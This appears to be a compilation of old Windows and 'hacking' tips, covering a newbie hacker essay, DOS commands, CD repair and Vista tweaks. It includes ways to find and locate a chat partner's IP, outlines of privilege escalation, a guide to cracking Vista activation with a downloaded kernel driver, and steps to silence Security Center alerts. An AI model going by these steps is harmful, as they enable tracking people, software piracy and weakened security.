everyone with no discrimination on the basis of age, colour, religious or political orientation. That's enough of a rant on freedom now. I'm sure most people are reading this to find out what it takes to become a hacker.
A hacker, as I have previously explained, is a person who has a craving for knowledge. If you don't have the will to learn continuously, spend countless hours reading, researching and improving then hacking defiantly isn't for you. Many people will give up after a few months, many I'm sure didn't even make it to this far into the document, if you did then well done, keep reading, in time, you will learn to truly enjoy hacking away at your own programs and helping others too. I am by no means a hacker; neither do I claim to be. However, I have been reading, learning and sometimes even contributing for quite a while now, and hopefully this document will allow you to do the same. Enough talk. This is where you start to learn.
As by now you will know, the main aim of hacking is knowledge. Before you can even hope to understand how to improve software you must fist understand how the current software works. Since most newbies (Newbie n. Someone who has little knowledge or experience with computer systems and/or programs) I assuming will be using a version of the Windows OS (OS - Operating System) Since you wish to learn how to hack I am assuming you have quite a strong grasp of the basics or Windows such as how to run programs, navigate your hard disk, install new software, hardware etc. If you do not know how to do this use the built in help function by clicking Start -> Help, or use your favourite search engine, I suggest google.com as it's probably the largest in the world. Learn how to use everything about your OS, including MS-DOS. To open a MS-DOS prompt, or shell Click on Start -> Programs -> MS-DOS Prompt , if this fails or the link isn't there for some unknown reason click Start -> Run and then type 'command.com'. This will run the program command.com, which is located in the c:\ directory of your hard disk. There are various programs that can be run from the dos prompt, which are very useful in basic hacking techniques.
Intro to MS-DOS
MS-DOS is a command line OS which is the basis for most windows OS's. It has many internal commands such as copy, cd, cls, ren, del. And several external commands including sys, move, format, deltree, syscopy. Internal commands are commands which are built into the command.com program and so can be run in any MS-DOS with no dependencies, External commands are commands which are not built into command.com, they are external programs which are usually found in c:\windows\command but can be found anywhere. In DOS, to find out what a command does you can type 'command /?' at a dos prompt where command is the name of the command you wish to learn about. This is invaluable and if you ever need to find out what a command does, this is the first thing you should try. Next I am going to explain some basic MS-DOS commands which will be useful during your exploration of the web.
ping
Usage: ping [-options] hostname.domain
Output:
Pinging yahoo.com [66.218.71.112] with 32 bytes of data:
Reply from 66.218.71.112: bytes=32 time=306ms TTL=45
Reply from 66.218.71.112: bytes=32 time=430ms TTL=45
Reply from 66.218.71.112: bytes=32 time=295ms TTL=45
Reply from 66.218.71.112: bytes=32 time=340ms TTL=45
Ping statistics for 66.218.71.112:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 295ms, Maximum = 430ms, Average = 342ms
Ping sends a ping request to a domain name to test its reactivity and response times. It does this by sending a packet of information to the server in question and requests a response. The output, as you can see is tells you the domain name that is being pinged, its IP address, the size of packets sent out, the response times, and averages. Ping is a very useful command as it tells you the IP address of a domain name, and tells you if it is 'alive' and responsive. The uses of this will become apparent later on. To find out extra options that can be used with ping, type 'ping /?' at the dos prompt.
netstat
Usage: netstat [-options]
Output:
Active Connections
Proto Local Address Foreign Address State
TCP pbn-computer:1067 w3.dcx.yahoo.com:80 ESTABLISHED
TCP pbn-computer:1069 209.73.225.7:80 ESTABLISHED
TCP pbn-computer:1070 212.187.244.14:80 ESTABLISHED
TCP pbn-computer:1071 212.187.244.14:80 ESTABLISHED
Netstat gives a list of all connections coming to and from your computer. It displays the ports (A virtual port of a computer is like an imaginary route for information to come in and out of your computer (to the internet) All services and programs which use the internet use a different port to ensure that information does not get sent to the wrong program) and IP's of both ends of the connections. There are thousands of available ports, not something you run out of. Once again, typing 'traceroute /?' at the dos prompt to get more information. Netstat can also be used as a crude method of getting a person's IP. To do this you do the following, for the sake of simplicity you should try to minimise the number of connections, this can be done by closing internet browsers, chat programs etc. Firstly, you will need to talk to the person on a chat program such as msn messenger, aim, yahoo messenger or something similar. At the dos prompt type 'netstat > temp1.txt' this will give the standard output, but the output will be routed into the file temp.txt (which if does not exist, will be created, and if does exist will be over written). Next you will need to establish a direct connection with the target computer, this can be done by initiating a file transfer. Whilst the file transfer is talking place you will need to once again type 'netstat >temp2.txt'. The next task is to compare the two files (temp1.txt and temp2.txt), the second file should contain an IP address that is not in the first, this new connection is the connection you initiated o the target computer, hence the IP address is the IP of your target.
tracert
Usage: tracert [-options] IP
Output:
Tracing route to yahoo.com [66.218.71.113]
over a maximum of 30 hops:
1 * * * Request timed out.
2 175 ms 180 ms 180 ms cdf-dam1-a-fa11.inet.ntl.com [62.252.33.201]

9 420 ms 320 ms 340 ms yahoo.com [66.218.71.113]
Trace complete.
Tracert short for trace route does exactly that, it traces the route taken by individual packets of information as they are transmitted across the Internet to the destination. The uses of this are numerous and will become clear as you learn more. In its simplest form it can be crudely used to find out a persons ISP and even locate them on a international level. For example, is you tracert a persons ISP, and the final hop before reaching them is m284-mp1-cvx1c.car.ntl.com [62.252.45.28] , we know that the person uses ntl as an ISP, on further investigation it can be found that ntl is a UK based ISP and the abbreviation .car. stands for Cardiff, a city in the UK. From this we know that the person in question uses ntl and lives in the vicinity of Cardiff. Encase any one out their is wondering, I do live in Cardiff, UK and the IP address is mine, its a dynamic IP address (dynamic means it changes every time I connect to the internet as oppose to static which means the connection is constant and IP does not change). Use 'tracert /?' for more information.
Ok, so they are three basic, and surprisingly simple yet useful commands to give you a basic understanding of DOS. If you want to learn more then I suggest you search the internet, http://www.google.com is, as far as I know, the biggest search engine on the web and along with the most simple of knowledge should allow you to find anything about anything.
The next step in your journey towards hackerdom is a programming language. Many people wonder why they should 'waste their time' learning a language to help them hack when they could just as easily download a trojan or other script kiddie (A 'script kiddie' is someone who uses other peoples programs to crack without the knowledge of how they work) tool to break into someone's computer. If you search the web I'm sure you can very easily find programs and viruses that let you take control of peoples computers, delete their programs and cause havoc. This is not hacking. Trojans, getting their name from the Greek trojan horse, require a program to be run on the target computer to allow you access. This will probably work on your friends who don't have virus scanners (as virus scanners will very easily pick up viruses) but if you set your sights on a computer owned by anyone with more than half a brain trojans simply are not effective. Again, to refer back to the original definition of hacking, it is about learning how systems work, how to improve them, not simply to break in and gain control. It is for this reason that in order to hack effectively you _must_ learn a programming language.
Their are many different languages out there to learn, they fall into two categories. There are interpreted languages, such as perl, python, bash scripting and even batch scripting (feel free to do a search on any of these to learn more about them). These languages are text files that contain commands that are interpreted by a program and then executed by the computer. They have the advantage of being quick to write and edit but the major advantage is that they can be run on any machine which supports the interpreter of that language but on the downside they run much slower than compiled languages and are generally less powerful. Compiled languages on the other hand create binary files, which do not require an interpreter. They are created when the language is written in a readable text file and then compiled by a compiler. This changes it into a binary file which understandable to humans. To change them you must edit the source code file and recompile them. They have the advantage of being much faster and they allow you to perform much more complex operations. However on the downside they take longer to edit and are OS specific. Examples of compiled languages are C and C++. It is advisable to learn at least one of each of the types of language as this will give you the advantages of both types of language. I suggest that you do some basic reading (again using a search engine) on all the languages I have mentioned. On a personal note, I would suggest that you learn perl, due to its power and simplicity as well as cross-platform compatibility and C, because it is as close as you will get to an Internet standard and is used by most open source programmers.
This brings me on to my next topic. Operating systems. As you immerse yourself into the world of hacking I'm sure you will hear everyone shouting at you to run gnu/Linux instead of windows. I'm also sure that most of you will have no idea why. First, a little history. The GNU project was started in 1984 with the aim of developing a completely free and open source operating system. In 1990 Linus Torvalds finished writing a Unix based open source kernel. An operating system is basically a lot of programs grouped together to run computer hardware the kernel is the software that interfaces directly with the hardware, and the other software interfaces with the kernel. In short, an operating system cannot exist with out both software and a kernel. By the time that Linus Torvalds finished writing his kernel, the Gnu project has just about finished writing their OS, all they were short of was a kernel. The timing was perfect. Linus and the GNU project teamed up to release the operating system which is commonly called Linux, but should be more accurately know as GNU/Linux. Since that time, Linus has continued developing his kernel and the GNU project has continued developing their software. Since then variations of the GNU/Linux system have developed called distributions. Each distribution is configured differently with slightly different software, each designed for different reasons. Examples of commonly used distributions are SuSe, RedHat, debian and slackware (each have .com sites). Linux is considered _the_ operating system for various reasons, not least of which is its freedom. The GNU/Linux operating system was, and is being, developed under the GNU public licence. This licence is intended to keep software free, under it you are able to change, sell or give away the software for any charge as long as you supply the source code along with it as so to enable other people to have the same rights as you have. Another benefit of the freedom of GNU/Linux is its stability, the fact that the source code is available to anyone means that anyone is free to add to it, change it, modify it. This means that if someone finds a bug they can find it, write a patch and submit it to the author who may include it in his next update. Due to its fundamental Unix like design, Linux is very virus resistant, its user based system it is hard for viruses to spread. Once again, if an exploit is found in and GNU/Linux software you can almost guarantee that a patch will be written within a few days, if not the same day, this means if security is a concern, you can keep your box wrapped up tight.
GNU/Linux also has many features built in which make it very good as a development platform. It has built in compilers for C and C++, most distributions also contain perl and python interpreters. Its openness also means that you can customise your distribution much more effectively than with windows, optimising it for speed, stability or security. This is the reason why most hackers or computer enthusiasts use Gnu/Linux. I'm not going to include a guide to how to use Linux, simply because their are so many out there do a search on google.com. However, since I'm feeling nice today I will point you in the direction of my favourite reference http://www.slackware.com/book/, it is supposed to be specific to Slackware Linux, but what it teaches is quite general and will work on any Linux system.
As well as all of the above, you should also continuously be reading and learning about current exploits and 'tricks' on both windows and Unix based operating systems. There is no end of information out there for those willing to search. To become a hacker you must want to learn about and more importantly understand everything you come into contact with. If there is a new concept you come into contact with, learn about it, search for it on google.com and if all else fails, ask.
Most hacks aim to gain root access, as you will now know from your experience of Linux systems, root is a super user that can do anything on the system. There are five common ways of getting root.
Misconfiguration
If excessive permission exists on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (particularly for startup rc files this would be as root).
Poor SUID
Sometimes you will find scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit it and run it. For example I once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.
Race Conditions
A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.
Poor Temp Files
Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.
Buffer Overflow
Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it.
Four out of the five ways of getting root mentioned above are only applicable on a machine where you have local access. In these cases you will need to get an account on the machine. This could be in a school or collage that you attend, or simply an internet shell account. Since this text is only meant to be an introduction and outline guide I will not go into huge details about these. There is plenty of information on the web, once again I suggest you use google.com, I can't stress enough how useful a search engine is in the world of hacking.
By far the most common way to gain a root shell is through a buffer overflow. It is also unsurprisingly the most complicated of the about ways of getting root and deserves a bit more explanation. Firstly, a buffer is simply a block of computer memory, which holds data of a certain type. If, as I suggested, you have learnt, or are learning, how to program in C, you will probably associate buffers with arrays. A stack has a set amount of space in memory, if you overflow the buffer by sending too much information, the extra data overflows onto the next stack and can be used to execute arbitrary code. For a much better explanation of buffer overflow techniques I suggest you read Phrack 49, File 14, called "Smashing The Stack For Fun And Profit" which can be found at http://www.phrack.com/phrack/49/P49-14 .
Well, it looks like this guide has come to an end. There is only one thing that I have left to say. If you follow all the instructions I have mentioned above, you will have a very good understanding of how the Internet, Ms-dos, Windows, Linux and various hacking techniques work, You may even be considered by some to be a Hacker. If you do end up in this situation, the world is yours, continue to learn, expand and enjoy..

How to install programs & games in a limited account !!
Step by Step:
1. When your installing the program here is what you have to do.
2. When it gives you the option of choosing the directory or destination where the program will be intall, before clicking next click browse to choose a different destination.
3. The destination your going to choose is
C:\Documents and Settings\"your username"\"name of program being installed"\
4. So just browse to
The C:\ drive
Then Documents and Settings
Then your User Name
5. The reason why you do this is because since your intalling it in your account name the computer doesn't stop or check anything because its your account and your name, but if you just select the desktop and choose to install it there it going to say something like "you do not have enough administrative privileges" something like that.
Removing Orkut Virus !!
so here how to Remove it
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file). If your pc is infected by this virus then just boot it in safe mode, goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder. Either you Go with A registry Cleaner to Remove it or here is the Easiest Method.
Open task manager>process tab>there if you find svchost.exe befor your user name (remember also system will use svchost.exe don't end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder.
Here Is the Code of that Virus >>

Recover the Scrath Cd's !!
Read-on, if you find yourself wishing for a miracle every time your fav CD is scratched:
Home Remedy :
here's an easy home remedy, which might give you the desired results. Rub a small amount of toothpaste on the scratch and polish the CD with a soft cloth and any petroleum-based polishing solution (like clear shoe polish). Squirt a drop of Brasso and wipe it with a clean cloth.
Technology to the rescue
There are many softwares available on the net, which enable the recovery of the CD data. BadCopy Pro is one such software, which can be used to recover destroyed data and files from a range of media.
Just a few clicks is all it requires to recover the disc from almost all kind of damage situation; be it corrupted, lost data, unreadable or defective.
DiskDoctors is another popular company, which offers both software and solutions to recover data from a scratched CDs and DVDs.
General Tips:
* Always wipe the CD from the center outward with stratight spoke-like strokes. Wiping CDs in circles will create more scratches.
◘ Do not scratch the graphics layer as you cannot repair the disc. HINT: Hold the disc up to a light with the graphics layer facing the light source. If you can see light thru the scratches at any point then the disc may be irreparable and or exhibit loading or playing errors.
◘ Clean your Disc players lens regularly with a suitable product to ensure optimal viewing pleasure.
◘ Make sure to use a soft, lint-free cloth to clean both sides of the disc. Wipe in a straight line from the centre of the disc to the outer edge.
◘ If wiping with a cloth does not remove a fingerprint or smudge, use a specialized DVD disc polishing spray to clean the disc.
◘ Only handle the disc by its outer edge and the empty hole in the middle. This will help prevent fingerprints, smudges or scratches.
Statistics:
◘ Fingermarks/prints cause 43% of disc problems!
◘ General wear & tear causes 25% of disc problems!
◘ Player-related issues cause 15% of disc problems!
◘ User-related issues cause 12% of disc problems!
◘ PlayStation 2 machine scratches cause 3% of disc problems!
◘ Laser rot (a manufacturer error) causes 2% of disc problems!

Clear Firefox Google Toolbar Search History
As you can see, clearing search history from Google Toolbar on Internet Explorer and Firefox is slightly a bit different. Not sure why they made it that way… Although it seems easy to clear Google search history, I did not immediately knew where to clear Google search history in Firefox Google Toolbar. I was searching through the options and the drop-down but I missed clicking the Google logo where the “Clear Search History” option is.
Hide Secret Messages in Images !!
If you search in Google on “Hide Messages in Images”, you’ll find a lot of program that can do this. Some are shareware and some are freeware. I’ve tested a few freewares and only 1 of it works fine in hiding messages inside images.
ImageHide is the one that gives me no problem in hiding text messages inside any image file.
It’s very easy to hide text messages in images by using ImageHide. First, load any image you want. At the bottom of ImageHide, you can type your secret text. Once you’ve done that, click on “Write Data button” to insert the text message into your image. Finally, click on Save Image button to save your image in either BMP or PNG format.
To read the hidden text message, click the Load Image button. If there is text embedded into that image, it’ll show the ImageHide version you’ve used to embed the text message, whether it’s encrypted or not and also the data size
The image file size is much smaller if you hide text message instead of hide mp3. If a normal image with small scale has big file size, it can be suspicious. I tried inserting a text “This is a Hidden Message” into a PNG image file, surprisingly the file size is 2kb smaller than the original image file.
Hiding text messages in images is NOT only for terrorist use. If you’re a graphic designer and someone used your images without your permission, you can sue them by having this very good proof. The person who ripped your images will have nothing to say if the image he has on his computer or website has hidden text that you placed.

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Use path wildcards to save time in explorer and command prompt!!
The first is one that I have been using for years. When working at a command prompt, instead to typing in the full text of an item, just hit the tab key to bring up full items. For example, say I want to change the directory to the Windows folder. At a command prompt I would type in CD wind and then hit the tab key and "Windows" will automatically show up. Think of the tab key as a kind of auto complete for DOS. This same technique also works in Windows Explorer.
Another tip was sent in by Robert Warriner also has a similar effect. Instead of hitting the tab key to bring up alternatives, you can use the * wildcard. For example, the command CD wind*\*32\dri* will change your directory to c:\windows\system32\drivers. The * wildcard will also work in Windows Explorer.

Extend Activation period past 180 days!!
Activation has always been more of burden for licensed Windows users than an effective deterrent for piracy. There are already many cracks for Windows Vista that bypass activation completely. The end result is a bad experience for those that legally buy the product.
For me, this is an issue that I am always fighting with. I am constantly building, installing and re-configuring my two computers with multiple vista virtual machines. I don't want to deal with the burden of having to activate my legal copies of Windows Vista every time since none of my workstations seem to last for more than a few months before I reinstall. If I actually activated my Vista Ultimate licenses every time I reinstall I would already have to use the slow phone based system where you have to type in that super long code. Sorry Microsoft, that is a horrible experience that I'm trying to avoid.
Using Brian's registry key and the old 180 day trick, it is possible to setup Task Scheduler to automate these changes to extend the period before you need to activate beyond 180 days. Follow these steps to automate the registry change and activation reset using Task Scheduler:
1.Click on the Start Button, type in Task Manager and hit Enter.
2.When Task Scheduler loads, right click on Task Scheduler Library and select Create Task.
3.Enter in a name for the new task such as "Activation Period Reset". Also, make sure that the user this account is run under is part of the Administrators group and the Run with highest privileges box is checked.
4.Click on the Triggers tab and hit the New button.
5.On the New Trigger tab, select Daily and Recur every 29 days (since activation is required 30 days after a reset) and hit OK.
6.Click on the Actions tab and hit New.
7.Enter in slmgr.vbs in the program/script box.
8.Enter in -rearm in the arguments box and hit OK.
9.Hit OK to save the settings for the new task you created.
10.Now you are ready for the second registry key change that will allow you to run the slmgr.vbs -rearm command more than three times. To do this, right click on the Task Scheduler Library folder again and select Create Task.
11.Enter in a name for the new task such as "Slmgr Reset ". Also, make sure that the user this account is run under is part of the Administrators group and the Run with highest privileges box is checked.
12.Click on the Triggers tab and hit the New button.
13.On the New Trigger tab, select Daily and Recur every 179 days (since slmgr needs to be reset after 180 days) and hit OK.
14.Click on the Actions tab and hit New.
15.Download and save this registry file to your computer.
16.Enter in regedit in the program/script box.
17.Enter in /s "full path to reg file" in the arguments box and hit OK.
18.Hit OK to save the settings for the new task you created.
Your computer is now configured to automatically reset the activation period every 29 days and reset your ability to reset the activation period every 179 days.
Permanently Activate Windows Vista !!
Until now, Microsoft has an upper hand, with no permanent or foolproof ways to crack or bypass Windows Vista activation request emerged. Instead, various workarounds and tricks to bypass, skip, delay, disable or spoof Vista activation has been suggestion, to various degree of success, such as extend evaluation period, rearm method, install Vista in future year, ‘frankenbuild’ Vista by replacing RTM build WPA files with RC build files, activate against spoofed KMS server, or run and activate Vista with own local KMS server and etc. Now, there is new crack method that able to permanently stop the countdown timer of time left to activate Windows Vista, effectively running Vista OS in full functionality evaluation mode forever.
Install Windows Vista Ultimate edition (or other edition) without product key.
Windows Vista needs to be applied with 2099-ReArm trick, so that the counter of minutes to no activation required period will not return to normal after reboot. Click on Start Orb button.
Select “All Programs”, then “Accessories”.
Right click on “Command Prompt, then select “Run as Administrator (A)”.
If User Account Control (UAC) prompt a warning message, click on “Continue”.
In the command prompt, type date and press Enter. You will see the following:
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>date
Current date: 12/19/2006 Thursday
Enter new date:
Enter 12/31/2099 (December 31, 2099).
Next, type cscript slmgr.vbs -rearm. You will see something like the following:
C:\Windows\system32>cscript slmgr.vbs -rearm
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.
The command completed successfully.
To make the change effectively, please restart the system.
Then reset the date of the system to current date again by typing date again. You will see the following:
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>date
Current date: 12/31/2099 Thursday
Enter new date:
Type in current date, i.e. 12/19/2006.
Exit from command prompt, but do not restart the computer.
Download StopTimer.zip, StopTimer.zip, StopTimer.zip or StopTimer.zip torrent.
Extract the downloaded archive file into a folder. It should contains “Vista test crack.exe” and “timerstop.sys”.
Execute or run the “Vista test crack.exe” by right click on “Vista test crack.exe”, and select “Run as Administrator (A)”.
Optional: Press in Test button, and it will pop up a message says 4 timers are stopped. At this time, the counter should be freezed, Check with slmgr.vbs -dlv command, with the minutes left should be the same after a few minutes interval. If it’s the case, continue with the following steps to run the crack every startup.
In the Vista test crack window, click on “Install” button. You will be prompted with “Service installed” message if everything is done properly and correctly. The crack will copy the patched stoptimer.sys to system folder and install a new service named “timerstop” to stop kernel-mode timers in spsys.sys system file.
Exit from the crack, and restart the computer.
The hacking is basically done. Next few steps to to verify that the activation grace period built-in countdown timer is actually stopped and disable the timers from working properly, and make sure that the crack is installed properly. After restart, log on to Windows Vista. Run for a few minutes.
Press on Windows + R keys.
Type slmgr.vbs -dlv to check the time left to activate Windows Vista. If the time left is 43200 minutes that’s mean the crack is successful.
With the crack, you will have the following in the registry:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
“Type”=dword:00000001
“Start”=dword:00000002

79,00,73,00,00,00
“DisplayName”=”TimerStop”
Further information:
◘ The TimerStop vista test crack works on all 32-bit x86 Windows Vista edition such as Vista Ultimate and Vista Home Premium. Success rate in 64-bit (x64) environment is likely to be low.
◘ The crack will make the time left to activate Vista to become always 43200 minutes (30 days), and will not countdown or reduce.
◘ It’s possible to access Windows Update if you install Windows Vista with default product key (no product key entered when installation).
◘ During the first 3 days of activation grace period after installing Windows Vista, ◘ Microsoft has designed it in such a way that Vista will allow greatest flexibility for users to install required drivers and application during this period, so Vista won’t prompt any reminder message for activation. After crack, Vista OS will always run with 30 days left for activation, thus there will not be any watermark or reminder to activate.
◘ It’s possible to pass Windows Vista Genuine Advantage (WVGA) validation, so users able to download Microsoft value-added software for genuine customers.
◘ As mentioned above, as Vista will also remain in first 3 days of activation grace period, in theory, Microsoft will not be able to differentiate who is the newly installed system, or who is the ‘patched’ system, unless of course, they check for the specific file or system (privacy anyone?).
◘ Users can only view that there is 30 more days for system to be activated in the system properties, but it won’t affect system usage or installation method.
15 tips and tricks for enhancing your Vista experience!!
2. Windows Vista's installer can detect serial-ATA (SATA) drives without the need to provide a driver diskette. Don't bother creating a diskette for your SATA drives before you install Vista.
3. If, for some reason, the Vista installation gets interrupted due to an unintentional shutdown or reboot, start the computer without booting the Vista DVD. Windows Vista's installer should pick up where it left off. If it does-n't, then restart the installation over from scratch.
4. When you perform a search with Vista's new, instant search feature, you can save the search in a special folder. This powerful feature allows you to create a virtual folder which, by default, is saved in your \\Searches\ folder. Every time you open such a folder, the search results are updated.
5. In Windows Vista, you can add additional clocks to the system tray. Click the clock, and then click Date and Time Settings. Click the Additional Clocks tab. You can add one or two additional clocks to the tray and select their time zones.
6. You can save your progress in most of the games included with Windows Vista—even the carry-overs from earlier versions of Windows.
7. You can create XML documents, which are more secure than regular text files or even word processor docs. Just create a document in a word processor, print it via the options menu, and select the XPS printer.
8. If you upgrade your graphics card in preparation for Windows Vista, be sure to get a new card with as much local memory as possible. Since Windows Vista renders everything—even the desktop and windows them-selves—as 3D surfaces, local 3D memory greatly improves performance...sometimes even more than a more powerful GPU.
9. Windows Vista games deposit their saves into a special directory, called Saved Games, in your personal folder. In theory, that will make upgrading to a new system much easier for gamers, who like to migrate their game saves.
10. When using the Help system, it's usually advantageous to include Microsoft's online database in your search. The online/offline status of your search is located on the bottom right of the Help window. You can click it to toggle.
11. The Games folder is a powerful repository of all things gaming. From within, you launch games, update games with the latest patches, enable parental controls to protect younger users from harmful content, and more. Invoke it by clicking Start/Games.
12. Several applications are available to help you tweak Windows Vista for maximum performance. They in-clude TweakVI (www.totalidea.com), TweakVista (www.tweakvista.com/tweakvistautility), and VistaBootPRO (www.vistabootpro.org). And don't forget about Windows ReadyBoost, which lets you use a removable flash memory drive to boost system memory.
13. Do you use the icon in the upper left corner of system and application windows? A quick double-click closes the window (instead of a single click on the X at the upper right). Though Microsoft left the icon out in Vista, the function remains.—Sarah Pike
14. In Microsoft Windows Explorer, you can use column headers (Name, Size, and so on) to sort files. Savvy users may right-click on a column head to remove items or add some—say, Dimensions for images. There are around 45 such columns available in Windows XP. Windows Vista has well over 250, covering a multitude of metadata.—Sarah Pike
15. If you've become used to surfing your Program Menu to get to applications, you'll be in for a shock when you first use Microsoft Windows Vista. The new Program Menu shows you only recently used applications and requires extra clicks to navigate to submenus. This can be very frustrating but, thankfully, the Search box Microsoft has added to the Start menu is a great replacement—as long as you're an accurate typist

Tabs in Yahoo Messenger !!

As you may have seen in the preview of Yahoo! Messenger for Windows Vista, tabbed IM windows are coming soon. This feature lets you group multiple conversations into one IM window and use tabs to navigate among them.
As it turns out, there are several hidden features that are built into Yahoo! Messenger, which can be turned on with changes to the Windows registry settings. One of our Messenger engineers, Hung Nguyen, developed some code that when installed, adds tabs to Yahoo! Messenger 8.1 (on Windows XP).
To try it out, first close all the IM windows you have open. Then click the “Turn ON tabs in Yahoo! Messenger” link below. When the download window appears, click the “Run” button and follow the on-screen instructions to install it. The next time you’re in two or more IM conversations at the same time, you’ll see the tabs in action. To close a tab, just right click on it.

Trick to disable the Orkut logout Script !!
In your Scrap Book Then the first method is just go to your internet options and disable the java script option and then go to ur scrap book And delete the Script some time this will not work on some pC's
then do this
This trick is to Disable the Flash , this script works on the Active X Or onflash so we simply Disable the Flash and delete the Script..
In my case i have done the same ..
Method 1.
Click Start, Run, type regedit
Go to following dir:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility
Click Edit, New, Key
Name New Key:
{D27CDB6E-AE6D-11CF-96B8-444553540000} (including the {})
Now create new DWORD value inside this key.
Rename this DWORD value to "Compatibility Flags"
Set Value Data to 400 and Base to Hexadecimal.
This may seem complicated but you will see along the way it makes much more sense.
If you want to disable flash correctly without compromising performance this is the way.
To enable flash simply delete the key.
Method 2.
To quickly disable and enable Flash in Internet Explorer when you want, here is an extension of the above registry edit. Tested with NT4, this should also work in XP and W2000.
Use a text editor (Notepad is fine) to create file:
c:\flash_disable.reg
and enter these 4 lines (the [ and ] should begin and end on one line):
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
Save this file and create another file, named c:\flash_enable.reg
and enter these 3 lines (again the [ and ] are all on one line):
REGEDIT4
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}]
Save this file, and exit the editor.
You now have some choices how you want to run each of the above files:
1. click Start-Run and type C:\flash_disable.reg, or C:\flash_enable.reg, or
2. create shortcuts on your desktop, or
3. create Start menu items to Disable and Enable Flash.
Only choice 3. is explained here for an Administrator on NT windows, so you may need to adapt it for other users or other Windows OS.
Open an Explorer window for C:\WINNT\Profiles\Administrator
(do this by clicking Start-Run and typing "C:\WINNT\Profiles\Administrator") and press the Enter key - quotes are essential here)
Click File-New-Shortcut and enter this line in the Command line field:
C:\WINNT\REGEDIT.EXE /s C:\flash_disable.reg
click on Next and enter this line in the 'select a name for the shortcut':
Disable Flash
Click on Finish and you now have a "Disable Flash" on the Start-Menu.
Do the same for Enable Flash, assuming you want to sometimes see Flash working. Here are the details:
Click File-New-Shortcut and enter this line:
C:\WINNT\REGEDIT.EXE /s C:\flash_enable.reg
click on Next and enter this line:
Enable Flash
Click on Finish and you now have a "Enable Flash" on the Start-Menu.
Now, whenever you want to disable flash without restarting browsers
and without any extra programs running, just click
Start-Menu-Disable Flash
and the menu item will silently and speedily disable Flash!
Similarly for Enable Flash.
Hope this much helps , if any problem ask me !!
Hidden Notepad feature (As a log file creator) !!
It can be used to make log files.
Give it a shot: Open Notepad and type .LOG on the first line, then save the file as whatever you want.
Now every time you open the file the current date and time will be appended to it,
which make it super-quick to create simple texty log files for whatever you want.
Of course, every word processor and many text editors have shortcut keys for inserting the date,
but simplicity does have its appeal.
The Microsoft knowledgebase says this feature only applies to Windows 98 and ME,
but it seems to work fine in XP as well.

Shutdown pc from dos prompt !!
type .... shutdown -s ( it'll give you 30 secs to save your work and then it'll shutdown)
for restart type shutdown -r
and for logoff type shutdown -l
for more options type shutdown only.
I tested these only on win xp ...

Disabling Security Center from within Services msc
1. Click Start button
2. Click Run
3. In the Run dialogue box type: ‘services.msc’ (without the quotes)
4. In the services window scroll down the list until you come to Security Center

8. Click the Green arrow on the right of the dialogue box
9. From the drop down menu select Disable
10. Click the Apply button followed by OK to Exit the Security Center Properties Window
11. Finally Exit Services msc
If u want to use the registry, u can to do follow this:
GO to registry and selcet HKLM\SOFTWARE\Microsoft\Security Center and in the right pane select the antivirusdisablenotify and firewalldisablenotify then change that value to 0.
(i.e.):
Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
Values Names: AntiVirusDisableNotify
FirewallDisableNotify
UpdatesDisableNotify
Data Type: REG_DWORD
Values: 00000001 = Do Not Display Alert
00000000 = Display Alert
Remeber Default value is 0.
Restriciting Logon Access !!
One way is to disable the Cancel button in the Logon dialog box.
Just run Regedit and go to:
HKEY_LOCAL_MACHINE/Network/Logon
Create the "Logon" subkey if it is not present on your machine: highlight the Network key -> right-click in the left hand Regedit pane -> select New -> Key -> name it "Logon" (no quotes) -> press Enter. Then add/modify a DWORD value and call it "MustBeValidated" (don't type the quotes). Double-click it, check the Decimal box and type 1 for value.
Now click the Start button -> Shut Down (Log off UserName) -> Log on as a different user, and you'll notice that the Logon Cancel button has been disabled.
Burn to 800MB CD-R !!
I will tell you how to burn to 800MB CD-R successfully using Nero 6.6.013
Requirements:
1. A branded 800MB CD-R preferrably Amkette.
